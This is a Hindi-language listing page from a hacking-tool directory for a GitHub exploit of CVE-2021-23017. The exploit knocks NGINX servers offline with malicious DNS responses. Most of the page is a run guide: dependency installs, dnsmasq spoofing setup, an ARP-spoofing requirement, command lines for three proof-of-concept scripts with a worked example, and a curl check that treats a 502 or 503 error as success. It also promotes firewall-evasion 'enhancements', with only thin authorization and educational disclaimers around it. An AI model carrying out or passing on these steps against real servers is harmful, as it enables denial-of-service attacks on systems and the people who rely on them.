Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EVIL-CVE-2021-23017-Update-2025 — NGINX सर्वरों (संस्करण 0.6.18–1.20.0) में भेद्यता। स्क्रिप्ट का उद्देश्य दुर्भावनापूर्ण DNS प्रतिक्रियाएँ भेजकर सेवा अस्वीकार (DoS) उत्पन्न करना है, जिसमें फ़ायरवॉल को बायपास करने के लिए संवर्द्धन किए गए हैं। | Kitploit
उपकरण/GitHubGitHub/6lj/evil-cve-2021-23017-update-2025
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगDNS विश्लेषण
GitHub6lj/evil-cve-2021-23017-update-2025

EVIL-CVE-2021-23017-Update-2025

NGINX सर्वरों (संस्करण 0.6.18–1.20.0) में भेद्यता। स्क्रिप्ट का उद्देश्य दुर्भावनापूर्ण DNS प्रतिक्रियाएँ भेजकर सेवा अस्वीकार (DoS) उत्पन्न करना है, जिसमें फ़ायरवॉल को बायपास करने के लिए संवर्द्धन किए गए हैं।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
111 महीने पहलेअभी तक समीक्षित नहीं

NGINX सर्वर्स (संस्करण 0.6.18–1.20.0) में कमजोरी। स्क्रिप्ट्स का उद्देश्य दुर्भावनापूर्ण DNS प्रतिक्रियाएँ भेजकर सेवा अस्वीकार (DoS) करना है, जिसमें फायरवॉल को बायपास करने के लिए संवर्द्धन शामिल हैं। यह M507/CVE-2021-23017-PoC से मूल PoC का उन्नत संस्करण है।

चेतावनी: केवल सिस्टम स्वामी से स्पष्ट लिखित अनुमति प्राप्त करके उपयोग करें। अनधिकृत परीक्षण अवैध है।

आवश्यकताएँ

  • वातावरण: Linux (जैसे, Kali Linux, Termux/वर्चुअलाइज्ड सेटअप के माध्यम से)।
  • निर्भरताएँ:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3-scapy dnsmasq
    pip3 install scapy requests
    
  • नेटवर्क: ARP स्पूफिंग के लिए लक्ष्य के समान सबनेट, या लक्ष्य NGINX को आपके DNS सर्वर IP का उपयोग करना चाहिए।

स्थापना

  1. रिपॉजिटरी क्लोन करें:
    root@kitploit:~
    git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
    cd EVIL-CVE-2021-23017-Update-2025
    
  2. dnsmasq सेट अप करें:
    root@kitploit:~
    sudo nano /etc/dnsmasq.conf
    
    जोड़ें:
    root@kitploit:~
    address=/test.example.com/192.168.1.100
    
    प्रारंभ करें:
    root@kitploit:~
    sudo systemctl start dnsmasq
    

यह क्या करता है

  • लंबे डोमेन नाम (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) के साथ दुर्भावनापूर्ण DNS प्रतिक्रियाएँ भेजकर NGINX सर्वर को क्रैश करता है।
  • curl और dig का उपयोग करके DNS क्वेरी ट्रिगर करता है ताकि कमजोरी का शोषण कर सके।
  • सीधे DNS पैकेट भेजकर और समानांतर प्रक्रियाओं का उपयोग करके फायरवॉल को बायपास करता है।

मूल से अंतर

M507/CVE-2021-23017-PoC की तुलना में:

  • उन्नत फायरवॉल बायपास: poc1.2.3.py में समानांतर प्रक्रियाओं का उपयोग करता है, एक साथ स्निफिंग, DNS भेजने और क्वेरी ट्रिगर करने के लिए, आपको तीनों को एक साथ चलाना होगा।
  • अनुकूलित पैकेट डिलीवरी: फायरवॉल फिल्टर से बचने के लिए पैकेट और क्वेरी की उच्च आवृत्ति।
  • सबनेट जाँच: ARP स्पूफिंग के लिए नेटवर्क संगतता सत्यापित करता है, विश्वसनीयता में सुधार करता है।

उपयोग

तीनों को एक साथ चलाएँ और उपयुक्त आर्गुमेंट के साथ चलाएँ (<target_ip>, <your_dns_server_ip>, <target_url> को बदलें)।

poc.py

root@kitploit:~
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • DNS क्वेरी को स्निफ करता है और उत्तर देता है।

poc2.py

root@kitploit:~
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • सीधे DNS भेजने और क्वेरी ट्रिगर करने को जोड़ता है।

poc3.py (अनुशंसित)

root@kitploit:~
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
  • अधिकतम दक्षता के लिए कार्यों को समानांतर में चलाता है।

उदाहरण

root@kitploit:~
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100

परिणाम सत्यापित करें

  • सर्वर स्थिति जाँचें:

    root@kitploit:~
    curl -I http://<target_url>
    
    • सफलता: 502 Bad Gateway या 503 Service Unavailable सर्वर क्रैश का संकेत देता है।
    • विफलता: 200 OK कोई कमजोरी या फायरवॉल अवरोधन नहीं होने का सुझाव देता है।
  • DNS ट्रैफिक मॉनिटर करें:

    root@kitploit:~
    sudo wireshark -f "udp port 53"
    

अस्वीकरण: केवल शैक्षिक उद्देश्यों के लिए। लेखक दुरुपयोग के लिए जिम्मेदार नहीं हैं।

टूल डाउनलोड करें